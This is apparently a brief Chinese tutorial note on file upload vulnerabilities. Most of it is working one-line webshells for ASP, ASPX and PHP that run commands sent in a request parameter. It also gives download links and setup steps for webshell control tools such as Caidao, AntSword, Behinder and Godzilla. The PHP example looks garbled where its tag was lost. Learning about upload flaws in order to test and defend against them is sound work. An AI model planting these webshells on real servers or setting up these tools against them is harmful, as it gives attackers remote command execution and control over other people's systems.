目录
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。常见场景是Web服务器允许用户上传图片或者普通文本文件保存,而用户绕过上传机制上传恶意代码并执行从而控制服务器。
常用Webshell:php 一句话木马:asp 一句话木马: <%eval request("value")%>aspx 一句话木马: <%@ Page Language="Jscript"%><%eval(Request.Item["value"])%>
以一句话木马为例
php@eval ( $_POST [ 'cmd' ]);?>
php的代码要写在 里面,服务器才能认出来这是php代码,然后才去解析。
$_POST['cmd'];
中国菜刀:https://github.com/raddyfiy/caidao-official-version
安装1. 下载 AntSword - Loaderhttps://github.com/AntSwordProject/AntSword-Loader/releases2. 下载 antSwordhttps://github.com/AntSwordProject/antSword/releases3. 解压并进入 AntSword - Loader 目录,新建 work 目录,解压 antSword 到 work 目录
安装Behinder :https://github.com/rebeyond/Behinder/releases
安装Godzilla :https://github.com/BeichenDream/Godzilla/releases